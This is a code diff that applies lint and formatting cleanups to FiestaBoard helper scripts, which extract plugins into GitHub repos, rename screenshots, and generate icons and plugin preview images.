         ["gh", "repo", "view", f"{ORG}/{repo_name}"],
-        capture_output=True, text=True,
+        capture_output=True,
+        text=True,
     )
     return result.returncode == 0
 
@@ -168,15 +168,16 @@ def gh_repo_exists(repo_name: str) -> bool:
 # Core extraction logic
 # ---------------------------------------------------------------------------
 
+
 def extract_plugin(plugin_id: str, dry_run: bool = False) -> bool:
     """
     Extract a single plugin into its own GitHub repository.
 
     Returns True on success, False on failure.
     """
-    log(f"\n{'='*60}")
+    log(f"\n{'=' * 60}")
     log(f"Extracting: {plugin_id}")
-    log(f"{'='*60}")
+    log(f"{'=' * 60}")
 
     plugin_dir = PLUGINS_DIR / plugin_id
     if not plugin_dir.exists():
@@ -208,22 +209,28 @@ def extract_plugin(plugin_id: str, dry_run: bool = False) -> bool:
 
     # 1. Create GitHub repo (skip if already exists)
     if gh_repo_exists(repo_name):
-        log(f"  Repo already exists, skipping creation.")
+        log("  Repo already exists, skipping creation.")
     else:
         log(f"  Creating GitHub repo {ORG}/{repo_name}...")
         try:
-            run([
-                "gh", "repo", "create", f"{ORG}/{repo_name}",
-                "--public",
-                "--description", f"FiestaBoard plugin: {manifest.get('name', plugin_id)}",
-            ])
+            run(
+                [
+                    "gh",
+                    "repo",
+                    "create",
+                    f"{ORG}/{repo_name}",
+                    "--public",
+                    "--description",
+                    f"FiestaBoard plugin: {manifest.get('name', plugin_id)}",
+                ]
+            )
         except subprocess.CalledProcessError as e:
             log(f"  ERROR: Failed to create repo: {e}")
             return False
 
     # 2. Clone repo locally
     if clone_dir.exists():
-        log(f"  Clone dir already exists, pulling latest...")
+        log("  Clone dir already exists, pulling latest...")
         try:
             run(["git", "pull", "--ff-only"], cwd=clone_dir)
         except subprocess.CalledProcessError as e:
@@ -238,7 +245,7 @@ def extract_plugin(plugin_id: str, dry_run: bool = False) -> bool:
             return False
 
     # 3. Copy plugin files into cloned repo
-    log(f"  Copying plugin files...")
+    log("  Copying plugin files...")
     for item in plugin_dir.iterdir():
         dest = clone_dir / item.name
         if item.is_dir():
@@ -255,32 +262,35 @@ def extract_plugin(plugin_id: str, dry_run: bool = False) -> bool:
     with open(manifest_dest, "w", encoding="utf-8") as f:
         json.dump(manifest, f, indent=2)
         f.write("\n")
-    log(f"  Updated manifest.json")
+    log("  Updated manifest.json")
 
     # 5. Add .gitignore
     gitignore_path = clone_dir / ".gitignore"
     if not gitignore_path.exists():
         gitignore_path.write_text(GITIGNORE_CONTENT)
-        log(f"  Added .gitignore")
+        log("  Added .gitignore")
 
     # 6. Add LICENSE (copy from main repo)
     license_dest = clone_dir / "LICENSE"
     if LICENSE_FILE.exists() and not license_dest.exists():
         shutil.copy2(LICENSE_FILE, license_dest)
-        log(f"  Added LICENSE")
+        log("  Added LICENSE")
 
     # 7. Commit and push
-    log(f"  Committing and pushing...")
+    log("  Committing and pushing...")
     try:
         run(["git", "add", "-A"], cwd=clone_dir)
 
         # Check if there's anything to commit
         status = subprocess.run(
             ["git", "status", "--porcelain"],
-            cwd=clone_dir, capture_output=True, text=True, check=True,
+            cwd=clone_dir,
+            capture_output=True,
+            text=True,
+            check=True,
         )
         if not status.stdout.strip():
-            log(f"  Nothing to commit, already up to date.")
+            log("  Nothing to commit, already up to date.")
         else:
             run(
                 ["git", "commit", "-m", f"feat: initial extraction of {plugin_id} plugin from FiestaBoard"],
@@ -299,21 +309,23 @@ def extract_plugin(plugin_id: str, dry_run: bool = False) -> bool:
         log(f"  Registry entry already exists for {plugin_id}, updating...")
         registry["plugins"] = [e for e in registry["plugins"] if e.get("id") != plugin_id]
 
-    registry["plugins"].append({
-        "id": plugin_id,
-        "name": manifest.get("name", plugin_id),
-        "description": manifest.get("description", ""),
-        "repository": repo_url,
-        "author": manifest.get("author", "FiestaBoard Team"),
-        "fiestaboard_version": FIESTABOARD_VERSION_CONSTRAINT,
-        "icon": manifest.get("icon", "puzzle"),
-        "category": manifest.get("category", "utility"),
-    })
+    registry["plugins"].append(
+        {
+            "id": plugin_id,
+            "name": manifest.get("name", plugin_id),
+            "description": manifest.get("description", ""),
+            "repository": repo_url,
+            "author": manifest.get("author", "FiestaBoard Team"),
+            "fiestaboard_version": FIESTABOARD_VERSION_CONSTRAINT,
+            "icon": manifest.get("icon", "puzzle"),
+            "category": manifest.get("category", "utility"),
+        }
+    )
 
     # Keep registry sorted by id for clean diffs
     registry["plugins"].sort(key=lambda e: e["id"])
     save_registry(registry)
-    log(f"  Registered in plugin-registry.json")
+    log("  Registered in plugin-registry.json")
 
     log(f"  Done: {plugin_id} -> {repo_url}")
     return True
@@ -323,10 +335,9 @@ def extract_plugin(plugin_id: str, dry_run: bool = False) -> bool:
 # CLI
 # ---------------------------------------------------------------------------
 
+
 def main() -> int:
-    parser = argparse.ArgumentParser(
-        description="Extract FiestaBoard plugins into standalone GitHub repositories."
-    )
+    parser = argparse.ArgumentParser(description="Extract FiestaBoard plugins into standalone GitHub repositories.")
     group = parser.add_mutually_exclusive_group(required=True)
     group.add_argument(
         "--plugin-id",
@@ -365,9 +376,9 @@ def main() -> int:
         if not ok:
             failed.append(plugin_id)
 
-    log(f"\n{'='*60}")
-    log(f"SUMMARY")
-    log(f"{'='*60}")
+    log(f"\n{'=' * 60}")
+    log("SUMMARY")
+    log(f"{'=' * 60}")
     log(f"  Succeeded: {len(plugins) - len(failed)}/{len(plugins)}")
     if failed:
         log(f"  Failed:    {', '.join(failed)}")
@@ -375,7 +386,7 @@ def main() -> int:
 
     if not args.dry_run:
         log(f"\nplugin-registry.json now has {len(load_registry().get('plugins', []))} entries.")
-        log(f"Remember to commit plugin-registry.json to the branch.")
+        log("Remember to commit plugin-registry.json to the branch.")
 
     return 0
 

--- a/scripts/fetch_plugin_stats.py
+++ b/scripts/fetch_plugin_stats.py
@@ -8,6 +8,7 @@ access to all plugin repos. Run from the repo root:
 
   python3 scripts/fetch_plugin_stats.py
 """
+
 import base64
 import datetime
 import json
@@ -67,7 +68,7 @@ def main() -> None:
         plugins_out = list(executor.map(fetch_plugin, registry["plugins"]))
 
     output = {
-        "generated_at": datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
+        "generated_at": datetime.datetime.now(datetime.UTC).strftime("%Y-%m-%dT%H:%M:%SZ"),
         "window_days": 14,
         "plugins": plugins_out,
     }

--- a/scripts/fix_plugin_screenshot_names.py
+++ b/scripts/fix_plugin_screenshot_names.py
@@ -14,7 +14,6 @@ Run from anywhere:
 """
 
 import os
-import shutil
 import subprocess
 import sys
 
@@ -23,35 +22,34 @@ BASE_DIR = os.path.expanduser("~/workspace")
 # Repos where docs/black/ and docs/white/ contain {name}-display.png
 # Maps repo name → old image stem (the part before -display.png)
 PLUGINS_TO_FIX = {
-    "air-fog":             "air-fog",
-    "baywheels":           "baywheels",
-    "dad-jokes":           "dad-jokes",
-    "disney-parks-times":  "disney-parks-times",
-    "generic-data":        "generic-data",
-    "guest-wifi":          "guest-wifi",
-    "home-assistant":      "home-assistant",
-    "last-fm":             "last-fm",
-    "muni":                "muni",
-    "nearby-aircraft":     "nearby-aircraft",
-    "santa-tracker":       "santa-tracker",
+    "air-fog": "air-fog",
+    "baywheels": "baywheels",
+    "dad-jokes": "dad-jokes",
+    "disney-parks-times": "disney-parks-times",
+    "generic-data": "generic-data",
+    "guest-wifi": "guest-wifi",
+    "home-assistant": "home-assistant",
+    "last-fm": "last-fm",
+    "muni": "muni",
+    "nearby-aircraft": "nearby-aircraft",
+    "santa-tracker": "santa-tracker",
     "spacecraft-launches": "spacecraft-launches",
-    "sports-scores":       "sports-scores",
-    "star-trek-quotes":    "star-trek-quotes",
-    "stardate":            "stardate",
-    "stocks":              "stocks",
-    "sun-art":             "sun-art",
-    "surf":                "surf",
-    "traffic":             "traffic",
-    "visual-clock":        "visual-clock",
-    "weather":             "weather",
-    "white-noise":         "white-noise",
-    "wsdot":               "wsdot",
+    "sports-scores": "sports-scores",
+    "star-trek-quotes": "star-trek-quotes",
+    "stardate": "stardate",
+    "stocks": "stocks",
+    "sun-art": "sun-art",
+    "surf": "surf",
+    "traffic": "traffic",
+    "visual-clock": "visual-clock",
+    "weather": "weather",
+    "white-noise": "white-noise",
+    "wsdot": "wsdot",
 }
 
 
 def run(cmd, cwd):
-    result = subprocess.run(cmd, cwd=cwd, capture_output=True, text=True)
-    return result
+    return subprocess.run(cmd, cwd=cwd, capture_output=True, text=True)
 
 
 def fix_repo(name, stem):
@@ -73,8 +71,9 @@ def fix_repo(name, stem):
             print(f"  ✗ WARN — source not found: docs/{color_dir}/{stem}-display.png")
             continue
 
-        r = run(["git", "mv", f"docs/{color_dir}/{stem}-display.png",
-                 f"docs/{color_dir}/board-display.png"], cwd=repo_dir)
+        r = run(
+            ["git", "mv", f"docs/{color_dir}/{stem}-display.png", f"docs/{color_dir}/board-display.png"], cwd=repo_dir
+        )
         if r.returncode != 0:
             print(f"  ✗ git mv failed for {color_dir}: {r.stderr.strip()}")
             return False
@@ -83,15 +82,21 @@ def fix_repo(name, stem):
         changed = True
 
     if not changed:
-        print(f"  — nothing to do")
+        print("  — nothing to do")
         return True
 
-    r = run(["git", "commit", "-m",
-             "fix: rename board screenshots to board-display.png\n\n"
-             "The docs-site pluginBoardImagePath() now expects\n"
-             "docs/black/board-display.png and docs/white/board-display.png.\n"
-             "Rename from the legacy {plugin-name}-display.png convention."],
-            cwd=repo_dir)
+    r = run(
+        [
+            "git",
+            "commit",
+            "-m",
+            "fix: rename board screenshots to board-display.png\n\n"
+            "The docs-site pluginBoardImagePath() now expects\n"
+            "docs/black/board-display.png and docs/white/board-display.png.\n"
+            "Rename from the legacy {plugin-name}-display.png convention.",
+        ],
+        cwd=repo_dir,
+    )
     if r.returncode != 0:
         print(f"  ✗ git commit failed: {r.stderr.strip()}")
         return False
@@ -101,7 +106,7 @@ def fix_repo(name, stem):
         print(f"  ✗ git push failed: {r.stderr.strip()}")
         return False
 
-    print(f"  ✓ pushed")
+    print("  ✓ pushed")
     return True
 
 
@@ -118,7 +123,7 @@ def main():
         else:
             skipped.append(name)
 
-    print(f"\n{'='*50}")
+    print(f"\n{'=' * 50}")
     print(f"Done. {len(passed)} pushed, {len(failed)} failed, {len(skipped)} skipped.")
     if failed:
         print(f"\nFailed: {failed}")

--- a/scripts/fix_plugin_screenshot_names.py
+++ b/scripts/fix_plugin_screenshot_names.py
@@ -90,10 +90,12 @@ def fix_repo(name, stem):
             "git",
             "commit",
             "-m",
-            "fix: rename board screenshots to board-display.png\n\n"
-            "The docs-site pluginBoardImagePath() now expects\n"
-            "docs/black/board-display.png and docs/white/board-display.png.\n"
-            "Rename from the legacy {plugin-name}-display.png convention.",
+            (
+                "fix: rename board screenshots to board-display.png\n\n"
+                + "The docs-site pluginBoardImagePath() now expects\n"
+                + "docs/black/board-display.png and docs/white/board-display.png.\n"
+                + "Rename from the legacy {plugin-name}-display.png convention."
+            ),
         ],
         cwd=repo_dir,
     )

--- a/scripts/generate_icons.py
+++ b/scripts/generate_icons.py
@@ -4,8 +4,8 @@ Generate all required icon sizes from the master fiesta-icon.png file.
 This script creates favicons, PWA icons, and app icons for various platforms.
 """
 
-import os
 from pathlib import Path
+
 from PIL import Image
 
 # Define all required icon sizes
@@ -19,26 +19,27 @@ PROJECT_ROOT = SCRIPT_DIR.parent
 MASTER_ICON = PROJECT_ROOT / "fiesta-icon.png"
 OUTPUT_DIR = PROJECT_ROOT / "web" / "public" / "icons"
 
+
 def generate_icons():
     """Generate all icon sizes from the master icon file."""
     # Check if master icon exists
     if not MASTER_ICON.exists():
         raise FileNotFoundError(f"Master icon not found: {MASTER_ICON}")
-    
+
     # Create output directory
     OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
-    
+
     # Load master icon
     print(f"Loading master icon from {MASTER_ICON}")
     master_image = Image.open(MASTER_ICON)
-    
+
     # Ensure it's RGBA (supports transparency)
     if master_image.mode != "RGBA":
         master_image = master_image.convert("RGBA")
-    
+
     print(f"Master icon size: {master_image.size}")
     print(f"Master icon mode: {master_image.mode}")
-    
+
     # Generate favicon sizes
     print("\nGenerating favicon sizes...")
     for size in FAVICON_SIZES:
@@ -46,23 +47,23 @@ def generate_icons():
         output_path = OUTPUT_DIR / f"favicon-{size}x{size}.png"
         icon.save(output_path, "PNG", optimize=True)
         print(f"  Created: {output_path}")
-    
+
     # Generate favicon.ico (multi-size ICO file)
     print("\nGenerating favicon.ico...")
     ico_sizes = [16, 32, 48]
     ico_images = []
     for size in ico_sizes:
         ico_images.append(master_image.resize((size, size), Image.Resampling.LANCZOS))
-    
+
     ico_path = OUTPUT_DIR / "favicon.ico"
     ico_images[0].save(
         ico_path,
         format="ICO",
         sizes=[(size, size) for size in ico_sizes],
-        append_images=ico_images[1:] if len(ico_images) > 1 else None
+        append_images=ico_images[1:] if len(ico_images) > 1 else None,
     )
     print(f"  Created: {ico_path}")
-    
+
     # Generate PWA icon sizes
     print("\nGenerating PWA icon sizes...")
     for size in PWA_SIZES:
@@ -70,26 +71,27 @@ def generate_icons():
         output_path = OUTPUT_DIR / f"icon-{size}x{size}.png"
         icon.save(output_path, "PNG", optimize=True)
         print(f"  Created: {output_path}")
-    
+
     # Generate apple-touch-icon
     print("\nGenerating Apple touch icon...")
     apple_icon = master_image.resize((APPLE_TOUCH_ICON_SIZE, APPLE_TOUCH_ICON_SIZE), Image.Resampling.LANCZOS)
     apple_path = OUTPUT_DIR / "apple-touch-icon.png"
     apple_icon.save(apple_path, "PNG", optimize=True)
     print(f"  Created: {apple_path}")
-    
+
     # Also create a root-level favicon.ico for Next.js
     root_favicon = PROJECT_ROOT / "web" / "public" / "favicon.ico"
     ico_images[0].save(
         root_favicon,
         format="ICO",
         sizes=[(size, size) for size in ico_sizes],
-        append_images=ico_images[1:] if len(ico_images) > 1 else None
+        append_images=ico_images[1:] if len(ico_images) > 1 else None,
     )
     print(f"  Created: {root_favicon}")
-    
+
     print(f"\n✓ Successfully generated {len(FAVICON_SIZES) + len(PWA_SIZES) + 3} icon files!")
     print(f"  Output directory: {OUTPUT_DIR}")
+
 
 if __name__ == "__main__":
     try:
@@ -97,7 +99,3 @@ if __name__ == "__main__":
     except Exception as e:
         print(f"\n✗ Error: {e}")
         exit(1)
-
-
-
-

--- a/scripts/generate_santa_tracker_images.py
+++ b/scripts/generate_santa_tracker_images.py
@@ -5,19 +5,17 @@ This script generates visual representations of the Santa Tracker plugin
 in different states and saves them as PNG images in the plugin's docs directory.
 """
 
-import sys
-import os
 import json
+import sys
 from pathlib import Path
-from datetime import datetime, timedelta
-from unittest.mock import patch
 
 # Add project root to path
 project_root = Path(__file__).parent.parent
 sys.path.insert(0, str(project_root))
 
-from PIL import Image, ImageDraw, ImageFont
-import importlib.util
+import importlib.util  # noqa: E402  (must follow sys.path setup above)
+
+from PIL import Image, ImageDraw, ImageFont  # noqa: E402
 
 # Load the plugin module
 plugin_path = project_root / "plugins" / "santa_tracker" / "__init__.py"
@@ -29,10 +27,10 @@ SantaTrackerPlugin = santa_tracker_module.SantaTrackerPlugin
 
 # Load manifest
 manifest_path = project_root / "plugins" / "santa_tracker" / "manifest.json"
-with open(manifest_path, 'r') as f:
+with manifest_path.open() as f:
     manifest = json.load(f)
 
-from src.board_chars import BoardChars
+from src.board_chars import BoardChars  # noqa: E402  (depends on sys.path setup above)
 
 # Official FiestaBoard color hex values
 COLOR_HEX = {
@@ -47,99 +45,94 @@ COLOR_HEX = {
     BoardChars.SPACE: "#0d0d0d",
 }
 
+
 def hex_to_rgb(hex_color):
     """Convert hex color to RGB tuple."""
-    hex_color = hex_color.lstrip('#')
-    return tuple(int(hex_color[i:i+2], 16) for i in (0, 2, 4))
+    hex_color = hex_color.lstrip("#")
+    return tuple(int(hex_color[i : i + 2], 16) for i in (0, 2, 4))
+
 
 def code_to_char(code: int) -> str:
     """Convert character code to character."""
     if 1 <= code <= 26:
-        return chr(ord('A') + code - 1)
-    elif 27 <= code <= 35:
+        return chr(ord("A") + code - 1)
+    if 27 <= code <= 35:
         return str(code - 26)
-    elif code == 36:
+    if code == 36:
         return "0"
-    else:
-        return " "
+    return " "
+
 
 def render_pattern(pattern_array, tile_size=40, gap=3):
     """Render a pattern array as an image matching the web UI style."""
     rows = len(pattern_array)
     cols = len(pattern_array[0]) if rows > 0 else 0
-    
+
     # Calculate image dimensions
     width = cols * tile_size + (cols - 1) * gap
     height = rows * tile_size + (rows - 1) * gap
-    
+
     # Create image with dark background
-    img = Image.new('RGB', (width, height), color=hex_to_rgb("#0d0d0d"))
+    img = Image.new("RGB", (width, height), color=hex_to_rgb("#0d0d0d"))
     draw = ImageDraw.Draw(img)
-    
+
     # Color tile margins
     color_margin_top = 3
     color_margin_bottom = 4
     color_margin_h = 1
-    
+
     # Draw each tile
     for row_idx, row in enumerate(pattern_array):
         for col_idx, code in enumerate(row):
             x = col_idx * (tile_size + gap)
             y = row_idx * (tile_size + gap)
-            
+
             if code in COLOR_HEX:
                 # Color tile
                 hex_color = COLOR_HEX[code]
                 color_rgb = hex_to_rgb(hex_color)
-                
+
                 color_x = x + color_margin_h
                 color_y = y + color_margin_top
                 color_w = tile_size - (color_margin_h * 2)
                 color_h = tile_size - (color_margin_top + color_margin_bottom)
-                
+
                 draw.rectangle(
-                    [color_x, color_y, color_x + color_w - 1, color_y + color_h - 1],
-                    fill=color_rgb,
-                    outline=None
+                    [color_x, color_y, color_x + color_w - 1, color_y + color_h - 1], fill=color_rgb, outline=None
                 )
-                
+
                 # Add subtle shadow effect
                 draw.rectangle(
                     [color_x, color_y, color_x + color_w - 1, color_y + 1],
-                    fill=tuple(min(255, c + 30) for c in color_rgb)
+                    fill=tuple(min(255, c + 30) for c in color_rgb),
                 )
                 draw.rectangle(
                     [color_x, color_y, color_x + 1, color_y + color_h - 1],
-                    fill=tuple(min(255, c + 20) for c in color_rgb)
+                    fill=tuple(min(255, c + 20) for c in color_rgb),
                 )
                 draw.rectangle(
                     [color_x, color_y + color_h - 2, color_x + color_w - 1, color_y + color_h - 1],
-                    fill=tuple(max(0, c - 40) for c in color_rgb)
+                    fill=tuple(max(0, c - 40) for c in color_rgb),
                 )
                 draw.rectangle(
                     [color_x + color_w - 2, color_y, color_x + color_w - 1, color_y + color_h - 1],
-                    fill=tuple(max(0, c - 30) for c in color_rgb)
+                    fill=tuple(max(0, c - 30) for c in color_rgb),
                 )
-                
+
                 # Center line (split-flap effect)
                 center_y = color_y + color_h // 2
                 draw.rectangle(
-                    [color_x, center_y, color_x + color_w - 1, center_y],
-                    fill=tuple(max(0, c - 20) for c in color_rgb)
+                    [color_x, center_y, color_x + color_w - 1, center_y], fill=tuple(max(0, c - 20) for c in color_rgb)
                 )
-                
+
             elif code == BoardChars.SPACE:
                 pass
             else:
                 # Character tile
                 bg_color = hex_to_rgb("#0d0d0d")
-                
-                draw.rectangle(
-                    [x, y, x + tile_size - 1, y + tile_size - 1],
-                    fill=bg_color,
-                    outline=None
-                )
-                
+
+                draw.rectangle([x, y, x + tile_size - 1, y + tile_size - 1], fill=bg_color, outline=None)
+
                 # Draw the character
                 char = code_to_char(code)
                 try:
@@ -155,13 +148,13 @@ def render_pattern(pattern_array, tile_size=40, gap=3):
                         try:
                             font = ImageFont.truetype(path, size=int(tile_size * 0.6))
                             break
-                        except:
+                        except Exception:
                             continue
                     if font is None:
                         font = ImageFont.load_default()
-                except:
+                except Exception:
                     font = ImageFont.load_default()
-                
+
                 if font:
                     bbox = draw.textbbox((0, 0), char, font=font)
                     text_width = bbox[2] - bbox[0]
@@ -169,13 +162,14 @@ def render_pattern(pattern_array, tile_size=40, gap=3):
                 else:
                     text_width = tile_size // 2
                     text_height = tile_size // 2
-                
+
                 text_x = x + (tile_size - text_width) // 2
                 text_y = y + (tile_size - text_height) // 2
-                
+
                 draw.text((text_x, text_y), char, fill=hex_to_rgb("#f0f0e8"), font=font)
-    
+
     return img
+
 
 def create_simple_display(text_lines, tile_size=35, gap=3):
     """Create a simple text display for Santa Tracker states."""
@@ -186,34 +180,31 @@ def create_simple_display(text_lines, tile_size=35, gap=3):
             line = text_lines[i].upper()[:22].ljust(22)
             row = []
             for char in line:
-                if char == ' ':
+                if char == " ":
                     row.append(BoardChars.SPACE)
-                elif 'A' <= char <= 'Z':
-                    row.append(ord(char) - ord('A') + 1)
-                elif '1' <= char <= '9':
-                    row.append(ord(char) - ord('1') + 27)
-                elif char == '0':
+                elif "A" <= char <= "Z":
+                    row.append(ord(char) - ord("A") + 1)
+                elif "1" <= char <= "9":
+                    row.append(ord(char) - ord("1") + 27)
+                elif char == "0":
                     row.append(36)
-                elif char == '%':
+                elif char == "%":
                     row.append(BoardChars.SPACE)  # Use space for special chars
-                elif char == ':':
-                    row.append(BoardChars.SPACE)
-                elif char == ',':
-                    row.append(BoardChars.SPACE)
-                elif char == '!':
+                elif char == ":" or char == "," or char == "!":
                     row.append(BoardChars.SPACE)
                 else:
                     row.append(BoardChars.SPACE)
             pattern.append(row)
         else:
             pattern.append([BoardChars.SPACE] * 22)
-    
+
     return render_pattern(pattern, tile_size, gap)
+
 
 def generate_screenshot(scenario: str, output_path: Path):
     """Generate a screenshot for a specific scenario."""
     print(f"Generating {scenario} screenshot...")
-    
+
     if scenario == "before-christmas":
         # Before Christmas state
         lines = [
@@ -267,31 +258,32 @@ def generate_screenshot(scenario: str, output_path: Path):
     else:
         print(f"  ERROR: Unknown scenario '{scenario}'")
         return False
-    
+
     # Create the image
     img = create_simple_display(lines, tile_size=35, gap=3)
-    
+
     # Add padding (bezel)
     padding = 30
     final_width = img.width + padding * 2
     final_height = img.height + padding * 2
-    
-    final_img = Image.new('RGB', (final_width, final_height), color=hex_to_rgb("#050505"))
+
+    final_img = Image.new("RGB", (final_width, final_height), color=hex_to_rgb("#050505"))
     final_img.paste(img, (padding, padding))
-    
+
     # Save image
     final_img.save(output_path, "PNG", optimize=True)
     print(f"  Saved to {output_path}")
     return True
 
+
 def main():
     """Generate all Santa Tracker screenshots."""
     docs_dir = project_root / "plugins" / "santa_tracker" / "docs"
     docs_dir.mkdir(parents=True, exist_ok=True)
-    
+
     print("Generating Santa Tracker screenshots...")
     print(f"Output directory: {docs_dir}\n")
-    
+
     scenarios = [
         ("display", "santa-tracker-display.png"),
         ("in-action", "santa-tracker-in-action.png"),
@@ -299,22 +291,22 @@ def main():
         ("during-delivery", "santa-during-delivery.png"),
         ("after-christmas", "santa-after-christmas.png"),
     ]
-    
+
     success_count = 0
     for scenario, filename in scenarios:
         output_path = docs_dir / filename
         if generate_screenshot(scenario, output_path):
             success_count += 1
         print()
-    
+
     print(f"Generated {success_count}/{len(scenarios)} images successfully")
-    
+
     if success_count == len(scenarios):
         print("\nAll images generated successfully!")
         return 0
-    else:
-        print("\nSome images failed to generate.")
-        return 1
+    print("\nSome images failed to generate.")
+    return 1
+
 
 if __name__ == "__main__":
     sys.exit(main())

--- a/scripts/generate_sun_art_images.py
+++ b/scripts/generate_sun_art_images.py
@@ -5,17 +5,17 @@ This script generates visual representations of each sun art stage
 and saves them as PNG images in the plugin's docs directory.
 """
 
-import sys
-import os
 import json
+import sys
 from pathlib import Path
 
 # Add project root to path
 project_root = Path(__file__).parent.parent
 sys.path.insert(0, str(project_root))
 
-from PIL import Image, ImageDraw, ImageFont
-import importlib.util
+import importlib.util  # noqa: E402  (must follow sys.path setup above)
+
+from PIL import Image, ImageDraw, ImageFont  # noqa: E402
 
 # Load the plugin module
 plugin_path = project_root / "plugins" / "sun_art" / "__init__.py"
@@ -27,10 +27,10 @@ SunArtPlugin = sun_art_module.SunArtPlugin
 
 # Load manifest
 manifest_path = project_root / "plugins" / "sun_art" / "manifest.json"
-with open(manifest_path, 'r') as f:
+with manifest_path.open() as f:
     manifest = json.load(f)
-from src.board_chars import BoardChars
-from datetime import datetime
+
+from src.board_chars import BoardChars  # noqa: E402  (depends on sys.path setup above)
 
 # Official FiestaBoard color hex values (from web/src/lib/board-colors.ts)
 COLOR_HEX = {
@@ -45,22 +45,24 @@ COLOR_HEX = {
     BoardChars.SPACE: "#0d0d0d",  # Dark background for space
 }
 
+
 def hex_to_rgb(hex_color):
     """Convert hex color to RGB tuple."""
-    hex_color = hex_color.lstrip('#')
-    return tuple(int(hex_color[i:i+2], 16) for i in (0, 2, 4))
+    hex_color = hex_color.lstrip("#")
+    return tuple(int(hex_color[i : i + 2], 16) for i in (0, 2, 4))
+
 
 # Character code to character mapping
 def code_to_char(code: int) -> str:
     """Convert character code to character."""
     if 1 <= code <= 26:
-        return chr(ord('A') + code - 1)
-    elif 27 <= code <= 35:
+        return chr(ord("A") + code - 1)
+    if 27 <= code <= 35:
         return str(code - 26)
-    elif code == 36:
+    if code == 36:
         return "0"
-    else:
-        return " "
+    return " "
+
 
 # Stage configurations: (stage_name, description)
 # 11 stages showing sun rising line-by-line then setting line-by-line
@@ -79,106 +81,99 @@ STAGES = [
     ("twilight", "Twilight - Fading to night, stars appearing"),
 ]
 
+
 def render_pattern(pattern_array, tile_size=40, gap=3):
     """Render a pattern array as an image matching the web UI style.
-    
+
     Args:
         pattern_array: 6x22 array of character codes
         tile_size: Size of each tile in pixels
         gap: Gap between tiles in pixels
-        
+
     Returns:
         PIL Image
     """
     rows = len(pattern_array)
     cols = len(pattern_array[0]) if rows > 0 else 0
-    
+
     # Calculate image dimensions
     width = cols * tile_size + (cols - 1) * gap
     height = rows * tile_size + (rows - 1) * gap
-    
+
     # Create image with dark background matching web UI (#0d0d0d)
-    img = Image.new('RGB', (width, height), color=hex_to_rgb("#0d0d0d"))
+    img = Image.new("RGB", (width, height), color=hex_to_rgb("#0d0d0d"))
     draw = ImageDraw.Draw(img)
-    
+
     # Color tile margins (smaller than full tile, like web UI)
     color_margin_top = 3
     color_margin_bottom = 4
     color_margin_h = 1
-    
+
     # Draw each tile
     for row_idx, row in enumerate(pattern_array):
         for col_idx, code in enumerate(row):
             x = col_idx * (tile_size + gap)
             y = row_idx * (tile_size + gap)
-            
+
             # Check if it's a color tile
             if code in COLOR_HEX:
                 # Color tile - draw with margins and rounded corners
                 hex_color = COLOR_HEX[code]
                 color_rgb = hex_to_rgb(hex_color)
-                
+
                 # Calculate color tile position (with margins)
                 color_x = x + color_margin_h
                 color_y = y + color_margin_top
                 color_w = tile_size - (color_margin_h * 2)
                 color_h = tile_size - (color_margin_top + color_margin_bottom)
-                
+
                 # Draw rounded rectangle for color tile
                 # PIL doesn't have rounded rectangles, so we'll use a workaround
                 # Create a mask for rounded corners
-                from PIL import ImageFilter
-                
+
                 # Draw the color tile rectangle
                 draw.rectangle(
-                    [color_x, color_y, color_x + color_w - 1, color_y + color_h - 1],
-                    fill=color_rgb,
-                    outline=None
+                    [color_x, color_y, color_x + color_w - 1, color_y + color_h - 1], fill=color_rgb, outline=None
                 )
-                
+
                 # Add subtle shadow effect (darker edges)
                 # Top highlight
                 draw.rectangle(
                     [color_x, color_y, color_x + color_w - 1, color_y + 1],
-                    fill=tuple(min(255, c + 30) for c in color_rgb)
+                    fill=tuple(min(255, c + 30) for c in color_rgb),
                 )
                 # Left highlight
                 draw.rectangle(
                     [color_x, color_y, color_x + 1, color_y + color_h - 1],
-                    fill=tuple(min(255, c + 20) for c in color_rgb)
+                    fill=tuple(min(255, c + 20) for c in color_rgb),
                 )
                 # Bottom shadow
                 draw.rectangle(
                     [color_x, color_y + color_h - 2, color_x + color_w - 1, color_y + color_h - 1],
-                    fill=tuple(max(0, c - 40) for c in color_rgb)
+                    fill=tuple(max(0, c - 40) for c in color_rgb),
                 )
                 # Right shadow
                 draw.rectangle(
                     [color_x + color_w - 2, color_y, color_x + color_w - 1, color_y + color_h - 1],
-                    fill=tuple(max(0, c - 30) for c in color_rgb)
+                    fill=tuple(max(0, c - 30) for c in color_rgb),
                 )
-                
+
                 # Center line (split-flap effect)
                 center_y = color_y + color_h // 2
                 draw.rectangle(
-                    [color_x, center_y, color_x + color_w - 1, center_y],
-                    fill=tuple(max(0, c - 20) for c in color_rgb)
+                    [color_x, center_y, color_x + color_w - 1, center_y], fill=tuple(max(0, c - 20) for c in color_rgb)
                 )
-                
+
             elif code == BoardChars.SPACE:
                 # Space - just leave as background
                 pass
             else:
                 # Character tile - use dark background with light text
                 bg_color = hex_to_rgb("#0d0d0d")
-                
+
                 # Draw tile background
-                draw.rectangle(
-                    [x, y, x + tile_size - 1, y + tile_size - 1],
-                    fill=bg_color,
-                    outline=None
-                )
-                
+                draw.rectangle([x, y, x + tile_size - 1, y + tile_size - 1], fill=bg_color, outline=None)
+
                 # Draw the character
                 char = code_to_char(code)
                 # Try to use a monospace font
@@ -195,13 +190,13 @@ def render_pattern(pattern_array, tile_size=40, gap=3):
                         try:
                             font = ImageFont.truetype(path, size=int(tile_size * 0.6))
                             break
-                        except:
+                        except Exception:
                             continue
                     if font is None:
                         font = ImageFont.load_default()
-                except:
+                except Exception:
                     font = ImageFont.load_default()
-                
+
                 # Calculate text position (centered)
                 if font:
                     bbox = draw.textbbox((0, 0), char, font=font)
@@ -210,30 +205,31 @@ def render_pattern(pattern_array, tile_size=40, gap=3):
                 else:
                     text_width = tile_size // 2
                     text_height = tile_size // 2
-                
+
                 text_x = x + (tile_size - text_width) // 2
                 text_y = y + (tile_size - text_height) // 2
-                
+
                 # Draw character in light color (#f0f0e8 from web UI)
                 draw.text((text_x, text_y), char, fill=hex_to_rgb("#f0f0e8"), font=font)
-    
+
     return img
+
 
 def generate_stage_image(stage_name: str, output_path: Path):
     """Generate an image for a specific stage.
-    
+
     Directly generates the pattern for the given stage name,
     bypassing elevation calculations (patterns are hardcoded).
-    
+
     Args:
         stage_name: Name of the stage (e.g., "night", "dawn", "noon")
         output_path: Path to save the image
     """
     print(f"Generating {stage_name} stage image...")
-    
+
